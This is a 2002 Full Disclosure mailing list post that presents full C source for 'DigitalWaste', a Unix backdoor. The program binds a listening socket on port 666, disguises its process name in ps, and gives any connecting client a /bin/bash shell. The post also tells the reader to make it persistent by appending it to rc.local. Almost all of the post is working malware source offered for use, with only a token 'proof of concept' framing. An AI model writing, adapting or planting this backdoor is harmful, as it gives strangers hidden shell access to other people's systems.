Full Disclosure mailing list archives
[ElectronicSouls] - Proof of Concept Backdoor
From: es () hush com
Date: Thu, 28 Nov 2002 23:31:10 -0800
-----BEGIN PGP SIGNED MESSAGE----- Dear List, This proof-of-concept code proves that systems can be backdoored in this fashion. Use this wisely. # cat DigitalWaste.c /************************************************************/ /* ---=DigitalWaste=--- */ /************************************************************/ /* */ /* -------------BASIC UNIX BACKDOOR */ /* (C) BrainStorm [ElectronicSouls] */ /************************************************************/ /* compile: */ /* # gcc dw.c -o DigitalWaste */ /************************************************************/ /* usage: ./dw & */ /* for example : */ /* - mv DigitalWaste /path/somwhere */ /* - echo "/path/somwhere &" >> /etc/rc.d/rc.local */ /************************************************************/ /* this is just a old piece of code that i made just for fun*/ /* ..i know its lame so if u don't like it just stfu ... */ /************************************************************/ #include <stdio.h> #include <errno.h> #include <signal.h> #include <stdlib.h> #include <netinet/in.h> #include <sys/types.h> #include <sys/socket.h> #include <strings.h> /* Change 'Port' & 'HIDE' defines if u want to ! */ #define P0rt 666 /* Change 'Port' to the port u want D.W. to listen on */ #define HiDE "DW" /* Change 'HIDE' to the name u want D.W. to show as in ps */ #define SH "/bin/bash" /* define SHELL #define LSTN 5 int main(int argc, char **argv) { char *fst = "\nConnected! =--------= DigitalWaste Unix Backdoor \n\n"; char *sec = "=----------= (C) BrainStorm [ElectronicSouls] =----- \n"; char *thr = "!! Be sure to enter each command followed by a ';' !!\n"; int outsock, insock, sz; struct sockaddr_in home; struct sockaddr_in away; home.sin_family=AF_INET; home.sin_port=htons(P0rt); home.sin_addr.s_addr=INADDR_ANY; bzero(&(home.sin_zero),8); strcpy(argv[0],HiDE); signal(SIGCHLD,SIG_IGN); if((outsock=socket(AF_INET,SOCK_STREAM,0))<0) exit(printf("------=> Socket error\n")); if((bind(outsock,(struct sockaddr *)&home,sizeof(home))<0)) exit(printf("------=> Bind error !\n")); if((listen(outsock,LSTN))<0) exit(printf("------=> Listen error !\n")); sz=sizeof(struct sockaddr_in); for(;;) { if((insock=accept(outsock,(struct sockaddr *)&away, &sz))<0) exit(printf("------=> Accept error !")); if(fork() !=0) { send(insock,fst,strlen(fst),0); send(insock,sec,strlen(sec),0); send(insock,thr,strlen(thr),0); dup2(insock,0); dup2(insock,1); dup2(insock,2); execl(SH,SH,(char *)0); /* guess what ?! */ close(insock); exit(0); /* well done =) */ } close(insock); } } /* ..a ElectronicSouls production ..thats it dudes.. */ # The Electronic Souls Crew [ElectronicSouls] (c) 2002 "We are friends of Brian McWilliams." -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wlMEARECABMFAj3nF80MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltCmAAn3DRiGHfp4UN UoLGRIWbK6vpBSBKAKCFw2L1+LXtvvY4GakmQT3DTqaU5Q== =xoX8 -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [ElectronicSouls] - Proof of Concept Backdoor es (Nov 29)